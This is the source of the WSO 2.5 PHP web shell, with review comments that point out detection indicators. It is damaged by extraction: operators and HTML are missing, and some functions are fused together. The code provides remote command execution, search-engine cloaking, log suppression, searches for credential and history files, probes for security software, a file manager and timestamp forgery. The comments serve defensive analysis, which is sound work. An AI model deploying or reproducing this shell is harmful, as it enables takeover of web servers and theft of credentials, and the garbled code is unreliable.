?php $auth_pass = «63a9f0ea7bb98050796b649e85481845»;
// NOTE(review): this listing is a PHP web shell; it names itself WSO and defines WSO_VERSION as
// '2.5' below. The page extraction replaced some ASCII quotes with « », dropped the "<" of the
// open tag and removed other characters, so the text does not parse as printed.
// $auth_pass is the value the login gate compares with md5() of the submitted password: an
// unsalted MD5 digest stored in the file itself.
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
// Crawler cloaking: when the User-Agent contains one of the listed search-engine names the
// script answers "404 Not Found" and exits, so indexers do not record the page. A URL whose
// status code changes with the User-Agent alone is a useful detection signal.
if (!empty ($_SERVER ['HTTP_USER_AGENT'])) {$userAgents = array ("Google", «Slurp», «MSNBot», «ia_archiver», "Yandex", «Rambler»);
if (preg_match ('/'. implode ('|', $userAgents). '/i', $_SERVER ['HTTP_USER_AGENT'])) {header ('HTTP/1.0 404 Not Found');
exit;}}
// PHP error logging is switched off and the execution time limit removed; the @ prefix hides
// any failure of these calls. Expect no trace of this script in the PHP error log.
@ini_set ('error_log', NULL);
@ini_set ('log_errors',0);
@ini_set ('max_execution_time',0);
@set_time_limit (0);
@set_magic_quotes_runtime (0);
@define ('WSO_VERSION', '2.5');
// When the legacy magic_quotes_gpc setting is on, strip the added slashes again, recursively,
// from POST and cookie data so request values reach the code unmodified.
if (get_magic_quotes_gpc ()) {function WSOstripslashes ($array) {return is_array ($array)? array_map ('WSOstripslashes', $array): stripslashes ($array);}
$_POST = WSOstripslashes ($_POST);
$_COOKIE = WSOstripslashes ($_COOKIE);}
// wsoLogin: ends the request by printing the password prompt.
// NOTE(review): only the text "Password:" is left in the string; the form markup that
// presumably surrounded it has been stripped by extraction.
function wsoLogin () {die ("
Password: ");}
// WSOsetcookie: stores $v under key $k both in this request's $_COOKIE array and in the
// response via setcookie(). Only name and value are passed, so the cookie carries no expiry,
// path, Secure or HttpOnly attribute.
function WSOsetcookie ($k, $v) {$_COOKIE [$k] = $v;
setcookie ($k, $v);}
// Login gate, active only when $auth_pass is non-empty. A POST field "pass" whose md5() equals
// $auth_pass sets a cookie named md5(Host header) with $auth_pass as its value; any request
// without that cookie value is sent to wsoLogin(), which terminates it.
// Both the cookie name and the cookie value are therefore fixed 32-hex-digit strings, and the
// value equals the constant embedded in the file, which makes the cookie pair a stable
// indicator to search for in proxy and web-server logs. Comparisons use loose == and !=.
// NOTE(review): the "&&" between isset (...) and the md5 comparison appears to have been lost
// in extraction.
if (!empty ($auth_pass)) {if (isset ($_POST ['pass']) (md5 ($_POST ['pass']) == $auth_pass))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']), $auth_pass);
if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]) || ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]!= $auth_pass))
wsoLogin ();}
// Environment setup: $os is 'win' when PHP_OS starts with "win" (case-insensitive), else 'nix'.
if (strtolower (substr (PHP_OS,0,3)) == «win»)
$os = 'win';
else
$os = 'nix';
// Error reporting is silenced unless safe_mode is on; disable_functions is read so later code
// can see which PHP functions the host has blocked.
$safe_mode = @ini_get ('safe_mode');
if (!$safe_mode)
error_reporting (0);
$disable_functions = @ini_get ('disable_functions');
$home_cwd = @getcwd ();
// The working directory for the whole request is taken from the POST field "c".
if (isset ($_POST ['c']))
@chdir ($_POST ['c']);
$cwd = @getcwd ();
// On Windows both paths are normalised to forward slashes.
// NOTE(review): the search string prints as "\" here; presumably "\\" before extraction.
if ($os == 'win') {$home_cwd = str_replace ("\", "/", $home_cwd);
$cwd = str_replace ("\", "/", $cwd);}
// Ensure $cwd ends with a slash. NOTE(review): ". =" is ".=" with a space inserted.
if ($cwd [strlen ($cwd)-1]!= '/')
$cwd. = '/';
// Default the per-host "ajax" preference cookie (md5(Host) . 'ajax') from $default_use_ajax.
if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax']))
$_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax'] = (bool)$default_use_ajax;
// $aliases: preset console menu, label => command line, one table for Windows and one for
// other systems; entries with an empty command ("Find", "Locate") act as group headings.
// The presets are reconnaissance commands: directory and process listings, network state,
// searches for SUID/SGID binaries and world-writable paths, and searches for configuration,
// credential and shell/database history files. Because the command lines are fixed strings,
// they work well as process-audit detections when the parent process is the web server or
// the PHP worker.
// NOTE(review): tokens such as "find." and "-name.htpasswd" look like "find ." and
// "-name .htpasswd" with a space removed by extraction, and the quoting of the two
// "config" patterns is damaged; treat the exact strings as approximate.
if ($os == 'win')
$aliases = array ("List Directory" => «dir»,
"Find index.php in current dir" => «dir /s /w /b index.php»,
"Find config.php in current dir" => «dir /s /w /b config.php»,
"Show active connections" => «netstat -an»,
"Show running services" => «net start»,
"User accounts" => «net user»,
"Show computers" => «net view»,
"ARP Table" => «arp -a»,
"IP Configuration" => «ipconfig /all»);
else
$aliases = array ("List dir" => «ls -lha»,
"list file attributes on a Linux second extended file system" => «lsattr -va»,
"show opened ports" => «netstat -an | grep -i listen»,
"process status" => «ps aux»,
"Find" => "",
"find all suid files" => «find / -type f -perm -04000 -ls»,
"find suid files in current dir" => «find. -type f -perm -04000 -ls»,
"find all sgid files" => «find / -type f -perm -02000 -ls»,
"find sgid files in current dir" => «find. -type f -perm -02000 -ls»,
"find config.inc.php files" => «find / -type f -name config.inc.php»,
"find config* files" => «find / -type f -name \»config\"",
"find config files in current dir" => «find. -type f -name \»config\"",
"find all writable folders and files" => «find / -perm -2 -ls»,
"find all writable folders and files in current dir" => «find. -perm -2 -ls»,
"find all service.pwd files" => «find / -type f -name service.pwd»,
"find service.pwd files in current dir" => «find. -type f -name service.pwd»,
"find all.htpasswd files" => «find / -type f -name.htpasswd»,
"find.htpasswd files in current dir" => «find. -type f -name.htpasswd»,
"find all.bash_history files" => «find / -type f -name.bash_history»,
"find.bash_history files in current dir" => «find. -type f -name.bash_history»,
"find all.fetchmailrc files" => «find / -type f -name.fetchmailrc»,
"find.fetchmailrc files in current dir" => «find. -type f -name.fetchmailrc»,
"Locate" => "",
"locate httpd.conf files" => «locate httpd.conf»,
"locate vhosts.conf files" => «locate vhosts.conf»,
"locate proftpd.conf files" => «locate proftpd.conf»,
"locate psybnc.conf files" => «locate psybnc.conf»,
"locate my.conf files" => «locate my.conf»,
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => «locate cfg.php»,
"locate conf.php files" => «locate conf.php»,
"locate config.dat files" => «locate config.dat»,
"locate config.php files" => «locate config.php»,
"locate config.inc files" => «locate config.inc»,
"locate config.inc.php" => «locate config.inc.php»,
"locate config.default.php files" => «locate config.default.php»,
"locate config files " => «locate config»,
"locate.conf files"=>"locate '.conf'",
"locate.pwd files" => «locate '.pwd'»,
"locate.sql files" => «locate '.sql'»,
"locate.htpasswd files" => «locate '.htpasswd'»,
"locate.bash_history files" => «locate '.bash_history'»,
"locate.mysql_history files" => «locate '.mysql_history'»,
"locate.fetchmailrc files" => «locate '.fetchmailrc'»,
"locate backup files" => «locate backup»,
"locate dump files" => «locate dump»,
"locate priv files" => «locate priv»);
// wsoHeader: defaults $_POST['charset'] to $default_charset, then echoes the page head: the
// Host header and WSO_VERSION, a stylesheet, and inline JavaScript.
// The script seeds the variables c_, a_, charset_ and p1_..p3_ from the request and defines
// set(), g() and a(), which copy values into the fields a, c, p1, p2, p3 and charset of a form
// named "mf" before submitting it. Those POST field names are the shell's whole request
// vocabulary, so they are the thing to match on in captured request bodies or WAF logs.
// NOTE(review): the HTML tags are missing from the echoed string, and inside the JavaScript
// loop ("for (i=0;i ...") the text jumps to form labels and a closing quote that presumably
// belong to wsoFooter, which is called elsewhere in this file but is not defined in the
// visible text. Everything between a "<" and a later ">" looks to have been dropped by
// extraction, so this span is two functions fused together.
function wsoHeader () {if (empty ($_POST ['charset']))
$_POST ['charset'] = $GLOBALS ['default_charset'];
global $color;
echo "". $_SERVER ['HTTP_HOST']. " — WSO ". WSO_VERSION. "
body {background-color:#444;color:#e1e1e1;}
body, td, th {font: 9pt Lucida, Verdana;margin:0;vertical-align:top;color:#e1e1e1;}
table.info {color:#fff;background-color:#222;}
span, h1, a {color: $color!important;}
span {font-weight: bolder;}
h1 {border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}
div.content {padding: 5px;margin-left:5px;background-color:#333;}
a {text-decoration:none;}
a:hover {text-decoration:underline;}.ml1 {border:1px solid #444;padding:5px;margin:0;overflow: auto;}.bigarea {width:100%;height:300px;}
input, textarea, select {margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace, 'Courier New';}
form {margin:0px;}
toolsTbl {text-align:center;}.toolsInp {width: 300px}.main th {text-align:left;background-color:#5e5e5e;}.main tr:hover {background-color:#5e5e5e}. l1 {background-color:#444}. l2 {background-color:#333}
pre {font-family:Courier, Monospace;}
var c_ = '". htmlspecialchars ($GLOBALS ['cwd']). "';
var a_ = '". htmlspecialchars (@$_POST ['a']). "'
var charset_ = '". htmlspecialchars (@$_POST ['charset']). "';
var p1_ = '". ((strpos (@$_POST ['p1'], "\n")!==false)?'':htmlspecialchars ($_POST ['p1'], ENT_QUOTES)). "';
var p2_ = '". ((strpos (@$_POST ['p2'], "\n")!==false)?'':htmlspecialchars ($_POST ['p2'], ENT_QUOTES)). "';
var p3_ = '". ((strpos (@$_POST ['p3'], "\n")!==false)?'':htmlspecialchars ($_POST ['p3'], ENT_QUOTES)). "';
var d = document;
function set (a, c, p1, p2, p3, charset) {if (a!=null) d.mf. a.value=a;else d.mf. a.value=a_;
if (c!=null) d.mf. c.value=c;else d.mf. c.value=c_;
if (p1!=null) d.mf. p1.value=p1;else d.mf. p1.value=p1_;
if (p2!=null) d.mf. p2.value=p2;else d.mf. p2.value=p2_;
if (p3!=null) d.mf. p3.value=p3;else d.mf. p3.value=p3_;
if (charset!=null) d.mf.charset.value=charset;else d.mf.charset.value=charset_;}
function g (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset);
d.mf.submit ();}
function a (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset);
var params = 'ajax=true';
for (i=0;i Read file
Make dir:$is_writable
Make file:$is_writable
Execute
Upload file:$is_writable
";}
// Fallback stubs: where posix_getpwuid / posix_getgrgid do not exist, define versions that
// return false so later owner/group lookups fall back to numeric ids.
// NOTE(review): an operator (presumably "&&") is missing between function_exists (...) and
// the strpos (...) test on disable_functions in both lines.
if (!function_exists ("posix_getpwuid") (strpos ($GLOBALS ['disable_functions'], 'posix_getpwuid')===false)) {function posix_getpwuid ($p) {return false;}}
if (!function_exists ("posix_getgrgid") (strpos ($GLOBALS ['disable_functions'], 'posix_getgrgid')===false)) {function posix_getgrgid ($p) {return false;}}
// wsoEx: runs $in as an operating-system command and returns what it printed.
// It uses the first of exec, passthru, system and shell_exec that function_exists() reports
// and otherwise falls back to popen; $in is passed through unchanged and warnings are hidden
// with @. The console, the `which` probes and the `df -h` call in this file all go through
// this function, so a shell or command interpreter started as a child of the web-server
// account is the host-level event to alert on. Hosts with no need for these five functions
// can list them in disable_functions.
// NOTE(review): "$out. =" is ".=" with a space inserted by extraction.
function wsoEx ($in) {$out = '';
if (function_exists ('exec')) {@exec ($in, $out);
$out = @join ("\n", $out);} elseif (function_exists ('passthru')) {ob_start ();
@passthru ($in);
$out = ob_get_clean ();} elseif (function_exists ('system')) {ob_start ();
@system ($in);
$out = ob_get_clean ();} elseif (function_exists ('shell_exec')) {$out = shell_exec ($in);} elseif (is_resource ($f = @popen ($in, "r"))) {$out = "";
while (!@feof ($f))
$out. = fread ($f,1024);
pclose ($f);}
return $out;}
// wsoViewSize: formats a byte count as "N.NN GB", "N.NN MB", "N.NN KB" or "N B".
// An int argument is first re-rendered as an unsigned decimal string with sprintf ('%u').
// NOTE(review): as printed the three tests are assignments ("$s = 1073741824"), so the first
// branch would always be taken; the comparison operators (presumably ">=") appear to have
// been lost in extraction.
function wsoViewSize ($s) {if (is_int ($s))
$s = sprintf ("%u", $s);
if ($s = 1073741824)
return sprintf ('%1.2f', $s / 1073741824). ' GB';
elseif ($s = 1048576)
return sprintf ('%1.2f', $s / 1048576). ' MB';
elseif ($s = 1024)
return sprintf ('%1.2f', $s / 1024). ' KB';
else
return $s. ' B';}
// wsoPerms: turns a numeric file mode $p into an ls-style string: one type character
// (s, l, -, b, d, c, p, or u when no type mask matches) followed by r/w/x triplets for owner,
// group and other, with s/S for the 0x0800 and 0x0400 bits and t/T for the 0x0200 bit.
// NOTE(review): every "($p 0x....)" has lost its operator, presumably a bitwise "&", and
// "$i. =" is ".=" with a space inserted; the function does not parse as printed.
function wsoPerms ($p) {if (($p 0xC000) == 0xC000)$i = 's';
elseif (($p 0xA000) == 0xA000)$i = 'l';
elseif (($p 0x8000) == 0x8000)$i = '-';
elseif (($p 0x6000) == 0x6000)$i = 'b';
elseif (($p 0x4000) == 0x4000)$i = 'd';
elseif (($p 0x2000) == 0x2000)$i = 'c';
elseif (($p 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i. = (($p 0x0100)? 'r': '-');
$i. = (($p 0x0080)? 'w': '-');
$i. = (($p 0x0040)? (($p 0x0800)? 's': 'x'): (($p 0x0800)? 'S': '-'));
$i. = (($p 0x0020)? 'r': '-');
$i. = (($p 0x0010)? 'w': '-');
$i. = (($p 0x0008)? (($p 0x0400)? 's': 'x'): (($p 0x0400)? 'S': '-'));
$i. = (($p 0x0004)? 'r': '-');
$i. = (($p 0x0002)? 'w': '-');
$i. = (($p 0x0001)? (($p 0x0200)? 't': 'x'): (($p 0x0200)? 'T': '-'));
return $i;}
// wsoPermsColor: returns the wsoPerms() string for file $f, with separate branches for a file
// that is not readable, readable but not writable, and writable.
// NOTE(review): all three branches return the same concatenation as printed; the wrapping
// markup (presumably a different colour per case, going by the name) has been stripped.
function wsoPermsColor ($f) {if (!@is_readable ($f))
return ''. wsoPerms (@fileperms ($f)). '';
elseif (!@is_writable ($f))
return ''. wsoPerms (@fileperms ($f)). '';
else
return ''. wsoPerms (@fileperms ($f)). '';}
// wsoScandir: returns the entry names of directory $dir, using scandir() when it exists and
// an opendir()/readdir() loop otherwise. In the fallback path $files is never initialised and
// the directory handle is not closed.
function wsoScandir ($dir) {if (function_exists ("scandir")) {return scandir ($dir);} else {$dh = opendir ($dir);
while (false!== ($filename = readdir ($dh)))
$files [] = $filename;
return $files;}}
// wsoWhich: runs "which <$p>" through wsoEx() and returns its output, or false when the
// output is empty. $p is concatenated into the command line without escaping; the callers
// visible in this file pass fixed program names from the lists in actionSecInfo.
function wsoWhich ($p) {$path = wsoEx ('which '. $p);
if (!empty ($path))
return $path;
return false;}
// actionSecInfo: host reconnaissance page. It reports the server software, loaded Apache
// modules, disable_functions, open_basedir, the safe-mode directories, cURL support and which
// database client functions exist; on non-Windows hosts it also reports whether /etc/passwd
// and /etc/shadow are readable and prints /proc/version, /etc/issue.net, `df -h` and
// /etc/hosts. wsoSecParam() is the row printer: it echoes a label and a trimmed value and
// skips empty values.
// NOTE(review): HTML markup has been stripped from the echoed strings throughout, and this
// span is two functions fused together (see the note further down).
function actionSecInfo () {wsoHeader ();
echo '
Server security information
';
function wsoSecParam ($n, $v) {$v = trim ($v);
if ($v) {echo ''. $n. ': ';
if (strpos ($v, "\n") === false)
echo $v. '';
else
echo ''. $v. '';}}
wsoSecParam ('Server software', @getenv ('SERVER_SOFTWARE'));
if (function_exists ('apache_get_modules'))
wsoSecParam ('Loaded Apache modules', implode (', ', apache_get_modules ()));
wsoSecParam ('Disabled PHP Functions', $GLOBALS ['disable_functions']?$GLOBALS ['disable_functions']:'none');
wsoSecParam ('Open base dir', @ini_get ('open_basedir'));
wsoSecParam ('Safe mode exec dir', @ini_get ('safe_mode_exec_dir'));
wsoSecParam ('Safe mode include dir', @ini_get ('safe_mode_include_dir'));
wsoSecParam ('cURL support', function_exists ('curl_version')?'enabled':'no');
$temp=array ();
if (function_exists ('mysql_get_client_info'))
$temp [] = «MySql (».mysql_get_client_info (). ")";
if (function_exists ('mssql_connect'))
$temp [] = «MSSQL»;
if (function_exists ('pg_connect'))
$temp [] = «PostgreSQL»;
if (function_exists ('oci_connect'))
$temp [] = «Oracle»;
wsoSecParam ('Supported databases', implode (', ', $temp));
echo '';
if ($GLOBALS ['os'] == 'nix') {wsoSecParam ('Readable /etc/passwd', @is_readable ('/etc/passwd')?"yes [view]":'no');
wsoSecParam ('Readable /etc/shadow', @is_readable ('/etc/shadow')?"yes [view]":'no');
wsoSecParam ('OS version', @file_get_contents ('/proc/version'));
wsoSecParam ('Distr name', @file_get_contents ('/etc/issue.net'));
// With safe_mode off the page probes, via wsoWhich(), for three fixed lists of programs:
// build and scripting tools ($userful), security products such as anti-virus scanners,
// intrusion detection, firewalls and rootkit checkers ($danger), and download clients
// ($downloaders). A burst of "which <name>" executions from the web-server account that
// walks these names in order is a recognisable trace of this page being opened.
if (!$GLOBALS ['safe_mode']) {$userful = array ('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array ('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array ('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
echo '';
$temp=array ();
foreach ($userful as $item)
if (wsoWhich ($item))
$temp [] = $item;
wsoSecParam ('Userful', implode (', ', $temp));
$temp=array ();
foreach ($danger as $item)
if (wsoWhich ($item))
$temp [] = $item;
wsoSecParam ('Danger', implode (', ', $temp));
$temp=array ();
foreach ($downloaders as $item)
if (wsoWhich ($item))
$temp [] = $item;
wsoSecParam ('Downloaders', implode (', ', $temp));
echo '';
wsoSecParam ('HDD space', wsoEx ('df -h'));
wsoSecParam ('Hosts', @file_get_contents ('/etc/hosts'));
echo 'posix_getpwuid ("Read" /etc/passwd) FromTo';
// NOTE(review): the numeric-range form below (p2 and p3 checked with is_numeric) is cut off
// inside its for-loop; going by the label above it presumably listed accounts by uid through
// posix_getpwuid. The next line continues in the middle of an array literal that builds a
// directory listing (path, modify, perms, size, owner, group). That is presumably the body of
// the file-manager action ($default_action is 'FilesMan'), whose header was lost together
// with the end of actionSecInfo. The remainder sorts the entries with wsoCmp() and renders
// rows plus copy / move / delete / zip / tar.gz controls driven by the "act" and "f" cookies.
if (isset ($_POST ['p2'], $_POST ['p3']) && is_numeric ($_POST ['p2']) && is_numeric ($_POST ['p3'])) {$temp = "";
for (;$_POST ['p2'] $GLOBALS ['cwd']. $dirContent [$i],
'modify' => date ('Y-m-d H:i:s', @filemtime ($GLOBALS ['cwd']. $dirContent [$i])),
'perms' => wsoPermsColor ($GLOBALS ['cwd']. $dirContent [$i]),
'size' => @filesize ($GLOBALS ['cwd']. $dirContent [$i]),
'owner' => $ow ['name']?$ow ['name']:@fileowner ($dirContent [$i]),
'group' => $gr ['name']?$gr ['name']:@filegroup ($dirContent [$i]));
if (@is_file ($GLOBALS ['cwd']. $dirContent [$i]))
$files [] = array_merge ($tmp, array ('type' => 'file'));
elseif (@is_link ($GLOBALS ['cwd']. $dirContent [$i]))
$dirs [] = array_merge ($tmp, array ('type' => 'link', 'link' => readlink ($tmp ['path'])));
elseif (@is_dir ($GLOBALS ['cwd']. $dirContent [$i]))
$dirs [] = array_merge ($tmp, array ('type' => 'dir'));}
$GLOBALS ['sort'] = $sort;
function wsoCmp ($a, $b) {if ($GLOBALS ['sort'] [0]!= 'size')
return strcmp (strtolower ($a [$GLOBALS ['sort'] [0]]), strtolower ($b [$GLOBALS ['sort'] [0]]))* ($GLOBALS ['sort'] [1]?1:-1);
else
return (($a ['size'] ['. htmlspecialchars ($f ['name']). ']'). ''. (($f ['type']=='file')?wsoViewSize ($f ['size']):$f ['type']). ''. $f ['modify']. ''. $f ['owner']. '/'. $f ['group']. ''. $f ['perms']. 'R T'. (($f ['type']=='file')?' E D':''). '';
$l = $l?0:1;}
echo "
CopyMoveDelete";
if (class_exists ('ZipArchive'))
echo «Compress (zip) Uncompress (zip)»;
echo «Compress (tar.gz)»;
if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f']))
echo «Paste / Compress»;
echo " ";
if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f']) && (($_COOKIE ['act'] == 'zip') || ($_COOKIE ['act'] == 'tar')))
echo «file name: »;
echo "
";
wsoFooter ();}
// actionStringTools: string-conversion page plus a recursive file search.
// $stringTools maps a menu label to a function name; hex2bin, binhex, hex2ascii, ascii2hex and
// full_urlencode are defined here when missing. The request supplies the function name in p1
// and its argument in p2, and p1 is only called after in_array() finds it among the table's
// values, so the callable set is limited to the listed conversion and hash functions.
// In AJAX mode the reply is the byte length, a newline, then JavaScript that writes the
// escaped result into the element "strOutput".
// wsoRecursiveGlob() walks the tree under $_POST['c'], matching names against the glob
// pattern in p3 and, when p2 is set, reading each matched file to test for that substring;
// it prints the matching paths. On the host this appears as the PHP worker opening large
// numbers of unrelated files in a short time.
// NOTE(review): loop comparisons ("$i strlen ($p)"), the operator in
// "empty (...)!empty (...)" and the call in the AJAX branch ("$_POST'p1'") are damaged by
// extraction, and the HTML around the echoed strings is stripped.
function actionStringTools () {if (!function_exists ('hex2bin')) {function hex2bin ($p) {return decbin (hexdec ($p));}}
if (!function_exists ('binhex')) {function binhex ($p) {return dechex (bindec ($p));}}
if (!function_exists ('hex2ascii')) {function hex2ascii ($p) {$r='';for ($i=0;$i strLen ($p);$i+=2) {$r. =chr (hexdec ($p [$i]. $p [$i+1]));} return $r;}}
if (!function_exists ('ascii2hex')) {function ascii2hex ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = sprintf ('%02X', ord ($p [$i]));return strtoupper ($r);}}
if (!function_exists ('full_urlencode')) {function full_urlencode ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = '%'.dechex (ord ($p [$i]));return strtoupper ($r);}}
$stringTools = array ('Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'binhex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',);
if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true);
ob_start ();
if (in_array ($_POST ['p1'], $stringTools))
echo $_POST'p1';
$temp = «document.getElementById ('strOutput').style.display='';document.getElementById ('strOutput').innerHTML='».addcslashes (htmlspecialchars (ob_get_clean ()), "\n\r\t\'\0"). "';\n";
echo strlen ($temp), "\n", $temp;
exit;}
if (empty ($_POST ['ajax'])!empty ($_POST ['p1']))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0);
wsoHeader ();
echo '
String conversions
';
echo "";
foreach ($stringTools as $k => $v)
echo "". $k. "";
echo " send using AJAX". (empty ($_POST ['p1'])?'':htmlspecialchars (@$_POST ['p2'])). "";
if (!empty ($_POST ['p1'])) {if (in_array ($_POST ['p1'], $stringTools)) echo htmlspecialchars ($_POST ['p1'] ($_POST ['p2']));}
echo"
Search files
Text
Path
Name
";
function wsoRecursiveGlob ($path) {if (substr ($path, -1)!= '/')
$path. ='/';
$paths = @array_unique (@array_merge (@glob ($path. $_POST ['p3']), @glob ($path. '*', GLOB_ONLYDIR)));
if (is_array ($paths)&&@count ($paths)) {foreach ($paths as $item) {if (@is_dir ($item)) {if ($path!=$item)
wsoRecursiveGlob ($item);} else {if (empty ($_POST ['p2']) || @strpos (file_get_contents ($item), $_POST ['p2'])!==false)
echo "".htmlspecialchars ($item). "";}}}}
if (@$_POST ['p3'])
wsoRecursiveGlob ($_POST ['c']);
echo "
Search for hash
";
wsoFooter ();}
// actionFilesTools: per-file operations on the path in $_POST['p1'] (URL-decoded first),
// selected by p2: download (streams the file as an attachment and exits), mkfile (creates an
// empty file, then switches to edit), view, highlight, hexdump and touch. The menu also lists
// edit, chmod and rename, whose case bodies are not in the visible text.
// The page prints the file's name, size, permissions, owner/group and its change, access and
// modify times. The touch case sets both access and modify time to a caller-chosen
// strtotime() value, so mtime and atime of files near a shell cannot be relied on when
// building a timeline; the inode change time is not something touch() can set and is the
// value to compare against.
// NOTE(review): the "&&" in the download test, the ":" after each case label, the bodies of
// the highlight and hexdump cases and all HTML markup are damaged or missing through
// extraction.
function actionFilesTools () {if (isset ($_POST ['p1']))
$_POST ['p1'] = urldecode ($_POST ['p1']);
if (@$_POST ['p2']=='download') {if (@is_file ($_POST ['p1']) @is_readable ($_POST ['p1'])) {ob_start ("ob_gzhandler", 4096);
header ("Content-Disposition: attachment; filename=".basename ($_POST ['p1']));
if (function_exists ("mime_content_type")) {$type = @mime_content_type ($_POST ['p1']);
header ("Content-Type: ". $type);} else
header ("Content-Type: application/octet-stream");
$fp = @fopen ($_POST ['p1'], «r»);
if ($fp) {while (!@feof ($fp))
echo @fread ($fp, 1024);
fclose ($fp);}} exit;}
if (@$_POST ['p2'] == 'mkfile') {if (!file_exists ($_POST ['p1'])) {$fp = @fopen ($_POST ['p1'], 'w');
if ($fp) {$_POST ['p2'] = «edit»;
fclose ($fp);}}}
wsoHeader ();
echo '
File tools
';
if (!file_exists (@$_POST ['p1'])) {echo 'File not exists';
wsoFooter ();
return;}
$uid = @posix_getpwuid (@fileowner ($_POST ['p1']));
if (!$uid) {$uid ['name'] = @fileowner ($_POST ['p1']);
$gid ['name'] = @filegroup ($_POST ['p1']);} else $gid = @posix_getgrgid (@filegroup ($_POST ['p1']));
echo 'Name: '.htmlspecialchars (@basename ($_POST ['p1'])). ' Size: '. (is_file ($_POST ['p1'])?wsoViewSize (filesize ($_POST ['p1'])):'-'). ' Permission: '.wsoPermsColor ($_POST ['p1']). ' Owner/Group: '. $uid ['name']. '/'. $gid ['name']. '';
echo 'Change time: '.date ('Y-m-d H:i:s', filectime ($_POST ['p1'])). ' Access time: '.date ('Y-m-d H:i:s', fileatime ($_POST ['p1'])). ' Modify time: '.date ('Y-m-d H:i:s', filemtime ($_POST ['p1'])). '';
if (empty ($_POST ['p2']))
$_POST ['p2'] = 'view';
if (is_file ($_POST ['p1']))
$m = array ('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array ('Chmod', 'Rename', 'Touch');
foreach ($m as $v)
echo ''. ((strtolower ($v)==@$_POST ['p2'])?' ['. $v. ']':$v). ' ';
echo '';
switch ($_POST ['p2']) {case 'view'
echo '';
$fp = @fopen ($_POST ['p1'], 'r');
if ($fp) {while (!@feof ($fp))
echo htmlspecialchars (@fread ($fp, 1024));
@fclose ($fp);}
echo '';
break;
case 'highlight'
if (@is_readable ($_POST ['p1'])) {echo '';
$code = @highlight_file ($_POST ['p1'], true);
echo str_replace (array ('';
break;
case 'hexdump'
$c = @file_get_contents ($_POST ['p1']);
$n = 0;
$h = array ('00000000', '', '');
$len = strlen ($c);
for ($i=0; $i';
break;
case 'touch'
if (!empty ($_POST ['p3'])) {$time = strtotime ($_POST ['p3']);
if ($time) {if (!touch ($_POST ['p1'], $time, $time))
echo 'Fail!';
else
echo 'Touched!';} else echo 'Bad time format!';}
clearstatcache ();
echo 'p3_="";';
break;}
echo '
';
wsoFooter ();}
// actionConsole: command console. The command line comes from $_POST['p1'] and is run through
// wsoEx(); when p2 is also set a stderr redirect is appended (printed here as " 2> 1", while
// the page's own label further down reads "2>&1") and the choice is remembered in a
// "stderr_to_out" cookie.
// Non-AJAX requests echo the command and its output HTML-escaped. AJAX requests reply with the
// byte length, a newline, then JavaScript that appends the output to the form's output field;
// a trailing "cd <dir>" in the command also changes the PHP working directory and reports the
// new value back as c_. The preset $aliases entries are rendered as a menu, and the inline
// script keeps a client-side command history navigated with key codes 38 and 40.
// NOTE(review): in the AJAX branch the string quotes have been removed by extraction
// (for example "echo d.cf.cmd.value='';\n;"), "cur—" is "cur--" and "cur cmds.length" has
// lost its comparison operator, so this function does not parse as printed.
function actionConsole () {if (!empty ($_POST ['p1'])!empty ($_POST ['p2'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', true);
$_POST ['p1']. = ' 2> 1';} elseif (!empty ($_POST ['p1']))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', 0);
if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true);
ob_start ();
echo d.cf.cmd.value='';\n;
$temp = @iconv ($_POST ['charset'], 'UTF-8', addcslashes (\n$. $_POST ['p1']. \n.wsoEx ($_POST ['p1']), \n\r\t\\'\0));
if (preg_match (!. *cd\s+ ([^;]+)$!, $_POST ['p1'], $match)) {if (@chdir ($match [1])) {$GLOBALS ['cwd'] = @getcwd ();
echo c_='. $GLOBALS ['cwd']. ';;}}
echo d.cf.output.value+='. $temp. ';;
echo d.cf.output.scrollTop = d.cf.output.scrollHeight;;
$temp = ob_get_clean ();
